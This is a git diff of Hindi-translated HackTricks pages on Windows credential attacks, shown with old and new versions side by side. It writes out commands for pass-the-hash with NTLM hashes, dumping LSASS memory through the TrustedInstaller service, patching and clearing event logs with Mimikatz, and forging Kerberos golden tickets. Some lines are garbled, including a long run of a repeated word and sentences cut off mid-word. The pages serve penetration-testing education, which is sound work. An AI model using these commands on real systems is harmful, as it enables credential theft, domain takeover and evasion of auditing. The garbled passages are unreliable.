Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 -Target dcorp-mgmt.dollarcorp.moneycorp.local -verbose Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 -Target dcorp-mgmt.dollarcorp.moneycorp.local -verbose
``` ```
#### Invoke-TheHash #### Invoke-TheHash
यह फ़ंक्शन **सभी अन्य का मिश्रण** है। आप **कई होस्ट्स** पास कर सकते हैं, कुछ को **बाहर कर सकते हैं** और जो **विकल्प** आप उपयोग करना चाहते हैं उसे **चुन सकते हैं** (_SMBExec, WMIExec, SMBClient, SMBEnum_)। यदि आप **SMBExec** और **WMIExec** में से **कोई भी** चुनते हैं लेकिन कोई _**Command**_ पैरामीटर नहीं देते हैं तो यह केवल **जांच** करेगा कि क्या आपके पास **पर्याप्त अनुमतिया** हैं। यह फ़ंक्शन **सभी अन्य** का **मिश्रण** है। आप **कई होस्ट** पास कर सकते हैं, **किसी को छोड़ सकते** हैं और जिस **विकल्प** का उपयोग करना चाहते हैं उसे **चुन सकते** हैं (_SMBExec, WMIExec, SMBClient, SMBEnum_). अगर आप **SMBExec** और **WMIExec** में से **किसी भी** को चुनते हैं लेकिन आप **कोई** _**कमांड**_ पैरामीटर नहीं देते हैं तो यह **बस जांचेगा** कि क्या आपके पास **पर्याप्त अनुमतिया** हैं।
``` ```
Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty h F6F38B793DB6A94BA04A52F1D3EE92F0 Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty h F6F38B793DB6A94BA04A52F1D3EE92F0
``` ```
### [Evil-WinRM Pass the Hash](../../network-services-pentesting/5985-5986-pentesting-winrm.md#using-evil-winrm) ### [Evil-WinRM पास द हैश](../../network-services-pentesting/5985-5986-pentesting-winrm.md#using-evil-winrm)
### Windows Credentials Editor (WCE) ### Windows Credentials Editor (WCE)
**इसे एडमिनिस्ट्रेटर के रूप में चलाने की आवश्यकता है** **इसे व्यवस्थापक के रूप में चलाया जाना चाहिए**
यह टूल mimikatz के समान कार्य करेगा (LSASS मेमोरी में संशोधन करेगा)। यह उपकरण mimikatz की तरही काम करेगा (LSASS मेमोरी को संशोधित करेगा)।
``` ```
wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt> wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
``` ```
### यूजरनेम और पासवर्ड के साथ मैनुअल विंडोज रिमोट एक्जीक्यूशन ### मैनुअल Windows रिमोट निष्पादन उपयोगकर्ता नाम और पासवर्ड के साथ
{% content-ref url="../lateral-movement/" %} {% content-ref url="../lateral-movement/" %}
[lateral-movement](../lateral-movement/) [lateral-movement](../lateral-movement/)
{% endcontent-ref %} {% endcontent-ref %}
## विंडोज होस्ट से क्रेडेंशियल्स निकालना ## एक Windows होस्ट से क्रेडेंशियल्स निकालना
**विंडोज होस्ट से क्रेडेंशियल्स प्राप्त करने के बारे में अधिक जानकारी के लिए आपको इस पेज को पढ़ना चाहिए।** **अधिक जानकारी के लिए** [**एक Windows होस्ट से क्रेडेंशियल्स प्राप्त करने के बारे में आपको इस पृष्ठ को पढ़ना चाहिए**](broken-reference)**.**
## NTLM रिले और रिस्पॉन्डर ## NTLM रिले और रिस्पॉन्डर
**इन हमलों को कैसे करें, इस पर अधिक विस्तृत गाइड के लिए यहाँ पढ़ें:** **इन हमलों को कैसे करने के बारे में अधिक विस्तृत गाइड के लिए यहाँ पढ़ें:**
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %} {% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) [spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
{% endcontent-ref %} {% endcontent-ref %}
## नेटवर्क कैप्चर से NTLM चैलेंजेस पार्स करना ## नेटवर्क कैप्चर से NTLM चैलेंज पार्स करें
**आप इसका उपयोग कर सकते हैं** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide) **आप** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide) **का उपयोग कर सकते हैं**
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस** चाहिए? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, hacktricks repo** और **hacktricks-cloud repo** में PRs सबमिट करके * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को फॉलो** करें
</details> </details>

View file

@ -4,48 +4,48 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें और** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके** अपना योगदान दें * **अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** (https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details> </details>
इस पृष्ठ की सामग्री [adsecurity.org](https://adsecurity.org/?page\_id=1821) से कॉपी की गई थी इस पृष्ठ की सामग्री [adsecurity.org](https://adsecurity.org/?page\_id=1821) से कॉपी की गई थी
## LM और Clear-Text मेमोरी में ## LM और मेमोरी में साफ-टेक्स्ट
Windows 8.1 और Windows Server 2012 R2 के साथ शुरू होकर, LM हैश और "क्लियर-टेक्स्ट" पासवर्ड अब मेमोरी में नहीं होते हैं। Windows 8.1 और Windows Server 2012 R2 के साथ, LM हैश और "साफ-टेक्स्ट" पासवर्ड अब मेमोरी में नहीं हैं।
"क्लियर-टेक्स्ट" पासवर्ड को LSASS में रखने से रोकने के लिए, निम्नलिखित रजिस्ट्री कुंजी को "0" पर सेट करना चाहिए (Digest Disabled): "साफ-टेक्स्ट" पासवर्ड को LSASS में रखने से रोकने के लिए, निम्नलिखित रजिस्ट्री कुंजी को "0" पर सेट किया जाना चाहिए (डाइजेस्ट अक्षम):
_HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential" (DWORD)_ _HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)_
## **Mimikatz & LSA Protection:** ## **Mimikatz और LSA सुरक्षा:**
Windows Server 2012 R2 और Windows 8.1 में LSA Protection नामक एक नई सुविधा शामिल है जिसमें [LSASS को Windows Server 2012 R2 पर संरक्षित प्रक्रिया के रूप में सक्षम किया जाता है](https://technet.microsoft.com/en-us/library/dn408187.aspx) (Mimikatz एक ड्राइवर के साथ इसे बाइपास कर सकता है, लेकिन इससे इवेंट लॉग में कुछ शोर हो सकता है): Windows Server 2012 R2 और Windows 8.1 में एक नई सुरक्षा विशेषता शामिल है जिसे LSA सुरक्षा कहा जाता है जिसमें [LSASS को Windows Server 2012 R2 पर संरक्षित प्रक्रिया के रूप में सक्षम किया गया है](https://technet.microsoft.com/en-us/library/dn408187.aspx) (Mimikatz एक ड्राइवर के साथ इसे छल सकता है, लेकिन इससे घटना लॉग में कुछ शोर करना चाहिए):
_एलएसए, जिसमें स्थानीय सुरक्षा प्राधिकरण सर्वर सेवा (LSASS) प्रक्रिया शामिल है, स्थानीय और दूरस्थ लॉगिन के लिए उपयोगकर्ताओं को मान्यता प्रदान करता है और स्थानीय सुरक्षा नीतियों को प्रवर्तित करता है। Windows 8.1 ऑपरेटिंग सिस्टम एलएसए के लिए अतिरिक्त सुरक्षा प्रदान करता है ताकि संरक्षित नहीं प्रक्रियाओं द्वारा मेमोरी और कोड इंजेक्शन पढ़ने और लिखने को रोका जा सके। इससे एलएसए द्वारा संग्रहित और प्रबंधित की जाने वाली प्रमाणिकाओं के लिए अतिरिक्त सुरक्षा प्रदान की जाती है।_ _LSA, जिसमें स्थानीय और दूरस्थ साइन-इन के लिए उपयोगकर्ताओं को मान्यता दी जाती है और स्थानीय सुरक्षा नीतियों को प्रवर्तित किया जाता है, विंडोज 8.1 ऑपरेटिंग सिस्टम एलएसए के लिए अतिरिक्त सुरक्षा प्रदान करता है ताकि गैर-संरक्षित प्रक्रियाओं द्वारा मेमोरी और कोड इंजेक्शन को पढ़ने और निषेधित करने से रोका जा सके। यह एलएसए द्वारा संभाले और प्रबंधित प्रमाणपत्रों के लिए अतिरिक्त सुरक्षा प्रदान करता है।_
LSA संरक्षण सक्षम करना: LSA सुरक्षा सक्षम करना:
1. रजिस्ट्री संपादक (RegEdit.exe) खोलें और रजिस्ट्री कुंजी तक नेविगेट करें जो निम्नलिखित स्थित है: HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa और रजिस्ट्री कुंजी के मान को सेट करें: "RunAsPPL"=dword:00000001। 1. रजिस्ट्री संपादक (RegEdit.exe) खोलें, और रजिस्ट्री कुंजी तक नेविगेट करें जो यहाँ स्थित है: HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa और रजिस्ट्री कुंजी का मान सेट करें: “RunAsPPL”=dword:00000001.
2. एक नया GPO बनाएं और कंप्यूटर कॉन्फ़िगरेशन, प्राथमिकताएँ, Windows सेटिंग्स पर ब्राउज़ करें। राइट-क्लिक करें रजिस्ट्री, नया के लिए प्वाइंट करें, और फिर रजिस्ट्री आइटम पर क्लिक करें। नई रजिस्ट्री संपत्ति डायलॉग बॉक्स दिखाई देती है। हाइव सूची में, HKEY\_LOCAL\_MACHINE पर क्लिक करें। कुंजी पथ सूची में, SYSTEM\CurrentControlSet\Control\Lsa तक ब्राउज़ करें। मान नाम बॉक्स में, RunAsPPL टाइप करें। मान प्रकार बॉक्स में, REG\_DWORD पर क्लिक करें। मान डेटा बॉक्स में, 00000001 टाइप करें। OK पर क्लिक करें। 2. एक नया जीपीओ बनाएं और कंप्यूटर कॉन्फ़िगरेशन, प्राथमिकताएँ, विंडोज सेटिंग्स में ब्राउज़ करें। राइट-क्लिक करें रजिस्ट्री, इंटेंट करें न्यू, और फिर रजिस्ट्री आइटम पर क्लिक करें। न्यू रजिस्ट्री प्रॉपर्टीज़ डायलॉग बॉक्स दिखाई देगा। हाइव सूची में, HKEY\_LOCAL\_MACHINE पर क्लिक करें। कुंजी पथ सूची में, SYSTEM\CurrentControlSet\Control\Lsa तक ब्राउज़ करें। मान नाम बॉक्स में, RunAsPPL टाइप करें। मान प्रकार बॉक्स में, REG\_DWORD पर क्लिक करें। मान डेटा बॉक्स में, 00000001 टाइप करें। OK पर क्लिक करें।
LSA Protection गैर-संरक्षित प्रक्रियाओं को LSASS के साथ संवाद करने से रोकता है। Mimikatz अभी भी इसे एक ड्राइवर ("!+") के साथ बाइपास कर सकता है। LSA सुरक्षा गैर-संरक्षित प्रक्रियाओं को LSASS के साथ बातचीत करने से रोकता है। Mimikatz एक ड्राइवर के साथ इसे अब भी छल सकता है ("!+").
[![Mimikatz-Driver-Remove-LSASS-Protection](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Driver-Remove-LSASS-Protection.jpg)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Driver-Remove-LSASS-Protection.jpg) [![Mimikatz-Driver-Remove-LSASS-Protection](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Driver-Remove-LSASS-Protection.jpg)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Driver-Remove-LSASS-Protection.jpg)
### Disabled SeDebugPrivilege को बाइपास करना ### अक्षम SeDebugPrivilege को छलना
डिफ़ॉल्ट रूप से, SeDebugPrivilege को स्थानीय सुरक्षा नीति के माध्यम से व्यवस डिफ़ॉल्ट रूप से, SeDebugPrivilege को स्थानीय सुरक्षा नीति के माध्यम से व्यवस्थापक समूह को प्रदान किया जाता है। एक एक्टिव डायरेक्टरी वातावरण में, [इस विशेषाधिकार को हटाना संभव है](https://medium.com/blue-team/preventing-mimikatz-attacks-ed283e7ebdd5) कंप्यूटर कॉन्फ़िगरेशन --> नीत
``` ```
sc config TrustedInstaller binPath= "C:\Users\Public\procdump64.exe -accepteula -ma lsass.exe C:\Users\Public\lsass.dmp" sc config TrustedInstaller binPath= "C:\Users\Public\procdump64.exe -accepteula -ma lsass.exe C:\Users\Public\lsass.dmp"
sc start TrustedInstaller sc start TrustedInstaller
``` ```
[![TrustedInstaller-Dump-Lsass](https://1860093151-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M6yZUYP7DLMbZuztKpV%2Fuploads%2FJtprjloNPADNSpb6S0DS%2Fimage.png?alt=media&token=9b639459-bd4c-4897-90af-8990125fa058) [![TrustedInstaller-Dump-Lsass](https://1860093151-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M6yZUYP7DLMbZuztKpV%2Fuploads%2FJtprjloNPADNSpb6S0DS%2Fimage.png?alt=media&token=9b639459-bd4c-4897-90af-8990125fa058)
यह डंप फ़ाइल एक हमलावर्द नियंत्रित कंप्यूटर पर भेजी जा सकती है जहां से क्रेडेंशियल्स निकाले जा सकते हैं। यह डंप फ़ाइल एक हमलावर नियंत्रित कंप्यूटर पर भेजी जा सकती है जहां से क्रेडेंशियल निकाले जा सकते हैं।
``` ```
# privilege::debug # privilege::debug
# sekurlsa::minidump lsass.dmp # sekurlsa::minidump lsass.dmp
@ -55,211 +55,147 @@ sc start TrustedInstaller
### **घटना** ### **घटना**
**EVENT::Clear** - एक घटना लॉग को साफ करें\ **EVENT::Clear** एक घटना लॉग को साफ करें\
[\ [\
![Mimikatz-Event-Clear](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear.png) ![Mimikatz-Event-Clear](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear.png)
**EVENT:::Drop** - (_**प्रायोगिक**_) नई घटनाओं से बचने के लिए इवेंट सेवा को पैच करें **EVENT:::Drop** (_**प्रयोगात्मक**_) नई घटनाओं से बचने के लिए इवेंट सेवा को पैच करें
[![Mimikatz-Event-Drop](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Drop.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Drop.png) [![Mimikatz-Event-Drop](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Drop.png)](https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Drop.png)
नोट:\ ध्यान दें:\
privilege::debug चलाएं और फिर event::drop को चलाएं ताकि इवेंट लॉग को पैच किया जा सके। फिर Event::Clear चलाएं ताकि कोई भी लॉग साफ होने की घटना (1102) लॉग न हो इवेंट लॉग को पैच करने के लिए privilege::debug चलाएं फिर event::drop को चलाएं। फिर Event::Clear को चलाएं ताकि कोई भी लॉग साफ हो बिना किसी लॉग साफ होने की घटना (1102) को लॉग न करें
### KERBEROS ### कर्बेरोस
#### गोल्डन टिकट #### गोल्डन टिकट
गोल्डन टिकट एक TGT है जिसमें KRBTGT NTLM पासवर्ड हैश का उपयोग करके एन्क्रिप्ट और साइन किया जाता है। गोल्डन टिकट एक टीजीटी है जिसमें KRBTGT NTLM पासवर्ड हैश का उपयोग करके एन्क्रिप्ट और साइन किया जाता है।
गोल्डन टिकट (GT) का निर्माण किसी भी उपयोगकर्ता (वास्तविक या कल्पित) के रूप में किया जा सकता है और डोमेन में किसी भी समूह के सदस्य के रूप में किया जा सकता है (जो लगभग असीमित संख्या में अधिकार प्रदान करता है) और डोमेन में हर एवं हर संसाधन के लिए गोल्डन टिकट (GT) क किसी भी उपयोगकर्ता (वास्तविक या कल्पित) का अनुकरण करने के लिए बनाया जा सकता है जो किसी भी समूह के सदस्य है डोमेन में (डोमेन में हर संसाधन के लिए एक असीमित मात्रा के अधिकार प्रदान करता है)।
**Mimikatz गोल्डन टिकट कमांड संदर्भ:** **Mimikatz Golden Ticket Command Reference:**
गोल्डन टिकट बनाने के लिए Mimikatz कमांड है "kerberos::golden" गोल्डन टिकट बनाने के लिए Mimikatz कमांड है "kerberos::golden"
* /domain - पूर्ण नामवाला डोमेन। इस उदाहरण में: "lab.adsecurity.org"। * /domain पूरी तरह से योग्य डोमेन नाम। इस उदाहरण में: "lab.adsecurity.org"।
* /sid - डोमेन का SID। इस उदाहरण में: "S-1-5-21-1473643419-774954089-2222329127"। * /sid डोमेन का SID। इस उदाहरण में: "S-1-5-21-1473643419-774954089-2222329127"।
* /sids - अधिक अधिकार वाले खातों / समूहों के लिए AD वन के अनुसार अतिरिक्त SID। सामान्यतः, इसमें रूट डोमेन के लिए Enterprise Admins समूह होगा "S-1-5-21-1473643419-774954089-5872329127-519"। [यह पैरामीटर प्रदान किए गए SID को SID History पैरामीटर में जोड़ता है।](https://adsecurity.org/?p=1640) * /sids अधिक SIDs जो आप टिकट को धोखा देना चाहते हैं एडी वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन वन
* /user - अनुकरण करने के लिए उपयोगकर्ता नाम
* /groups (वैकल्पिक) - उपयोगकर्ता के सदस्य होने वाले समूह RID (पहला मुख्य समूह है)।\
एक ही पहुंच प्राप्त करने के लिए उपयोगकर्ता या कंप्यूटर खाता RID जोड़ें।\
डिफ़ॉल्ट समूह: 513,512,520,518,519 विख्यात प्रशासक समूहों के लिए (नीचे सूचीबद्ध)
* /krbtgt - डोमेन KDC सेवा खाता (KRBTGT) के लिए NTLM पासवर्ड हैश। TGT को एन्क्रिप्ट और साइन करने के लिए उपयोग किया जाता है।
* /ticket (वैकल्पिक) - बाद में उपयोग के लिए गोल्डन टिकट फ़ाइल को सहेजने के लिए पथ और नाम प्रदान करें या /ptt का उपयोग करें ताकि तत्काल गोल्डन टिकट को मेमोरी में इंजेक्ट किया जा सके।
* /ptt - /ticket के विकल्प के रूप में - इसका उपयोग करें ताकि जाली टिकट को तत्काल उपयोग के लिए मेमोरी में इंजेक्ट किया जा सके।
* /id (वैकल्पिक) - उपयोगकर्ता RID। Mimikatz की डिफ़ॉल्ट मान्यांकन 500 है (डिफ़ॉल्ट प्रशासक खाता RID)।
* /startoffset (वैकल्पिक) - जब टिकट उपलब्ध होता है तो प्रारंभ ऑफ़सेट (सामान्यतः -10 या 0 सेट किया जाता है यदि यह विकल्प उपयोग किया जाता है)। Mimikatz की डिफ़ॉल्ट मान्यांकन 0 है।
* /endin (वैकल्पिक) - टिकट की आयु। Mimikatz की डिफ़ॉल्ट मान्यांकन 10 वर्ष (\~5,262,480 मिनट) है। Active Directory की डिफ़ॉल्ट केरबेरोस नीति सेटिंग 10 घंटे (600 मिनट) है।
* /renewmax (वैकल्पिक) - नवीनीकरण के साथ अधिकतम टिकट आयु। Mimikatz की डिफ़ॉल्ट मान्यांकन 10 वर्ष (\~5,262,480 मिनट) है। Active Directory की डिफ़ॉल्ट केरबेरोस नीति सेटिंग 7 दिन (10,080 मिनट) है।
* /sids (वैकल्पिक) - AD वन में Enterprise Admins समूह के SID (\[ADRootDomainSID]-519) को सेट करें ताकि AD वन में उच्चाधिकारिक अधिकारों को जाली बनाएं (AD वन में हर डोमेन में AD व्यवस्थापक)।
* /aes128 - AES128 कुंजी
* /aes256 - AES256 कुंजी
गोल्डन टिकट डिफ़ॉल्ट समूह:
* डोमेन उपयोगकर्ता SID: S-1-5-21\<DOMAINID>-513
* डोमेन व्यवस्थापक SID: S-1-5-21\<DOMAINID>-512
* स्कीमा व्यवस्थापक SID: S-1-5-21\<DOMAINID>-518
* एंटरप्राइज व्यवस्थापक SID: S-1-5-21\<DOMAINID>-519 (यह केवल तब प्रभावी होता है जब जाली टिकट वन रूट डोमेन में बनाया जाता है, हालांकि AD वन व्यवस्थापक अधिकारों के लिए /sids पैरामीटर का उपयोग करके जोड़ें)
* समूह नीति निर्माता मालिक SID: S-1-5-21\<DOMAINID>-520
``` ```
.\mimikatz "kerberos::golden /User:Administrator /domain:rd.lab.adsecurity.org /id:512 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit .\mimikatz "kerberos::golden /User:Administrator /domain:rd.lab.adsecurity.org /id:512 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
``` ```
[डोमेन के बीच सोने के टिकट](https://adsecurity.org/?p=1640) [डोमेन के लिए सोने के टिकट](https://adsecurity.org/?p=1640)
#### सिल्वर टिकट #### सिल्वर टिकट
एक सिल्वर टिकट एक TGS है (फॉर्मेट में TGT के समान) जिसमें लक्षित सेवा खाते का उपयोग करके (SPN मैपिंग द्वारा पहचाना जाता है) NTLM पासवर्ड हैश का उपयोग करके इसे एन्क्रिप्ट और साइन किया जाता है। एक सिल्वर टिकट एक TGS (फॉर्मेट में TGT के समान) है जो लक्ष्य सेवा खाते का (SPN मैपिंग द्वारा पहचाना गया) NTLM पासवर्ड हैश का उपयोग करके एन्क्रिप्ट और साइन करता है।
**सिल्वर टिकट बनाने के लिए उदाहरण Mimikatz कमांड:** **उदाहरण Mimikatz कमांड एक सिल्वर टिकट बनाने के लिए:**
निम्नलिखित Mimikatz कमांड एक सिल्वर टिकट बनाता है जो सर्वर adsmswin2k8r2.lab.adsecurity.org पर CIFS सेवा के लिए है। इस सिल्वर टिकट को सफलतापूर्वक बनाने के लिए, adsmswin2k8r2.lab.adsecurity.org के लिए AD कंप्यूटर खाता पासवर्ड हैश को खोजा जाना चाहिए, या तो AD डोमेन डंप से या ऊपर दिखाए गए लोकल सिस्टम पर Mimikatz चलाकर (_Mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit_)। NTLM पासवर्ड हैश को /rc4 पैरामीटर के साथ उपयोग किया जाता है। सेवा SPN प्रकार को /service पैरामीटर में पहचाना जाना चाहिए। अंत में, लक्षित कंप्यूटर का पूर्ण-योग्य डोमेन नाम /target पैरामीटर में प्रदान किया जाना चाहिए। /sid पैरामीटर में डोमेन SID को न भूलें। निम्नलिखित Mimikatz कमांड एक सिल्वर टिकट बनाता है जो सर्वर adsmswin2k8r2.lab.adsecurity.org पर CIFS सेवा के लिए है। इस सिल्वर टिकट को सफलतापूर्वक बनाने के लिए, adsmswin2k8r2.lab.adsecurity.org के लिए AD कंप्यूटर खाता पासवर्ड हैश को खोजना होगा, या तो एडी डोमेन डंप से या ऊपर दिखाए गए स्थानीय सिस्टम पर Mimikatz चलाकर। NTLM पासवर्ड हैश का उपयोग /rc4 पैरामीटर के साथ किया जाता है। सेवा SPN प्रकार को /service पैरामीटर में पहचाना जाना चाहिए। अंततः, लक्ष्य कंप्यूटर का पूरी तरह से विस्तारित डोमेन नाम /target पैरामीटर में प्रदान किया जाना चाहिए। /sid पैरामीटर में डोमेन SID को न भूलें।
``` ```
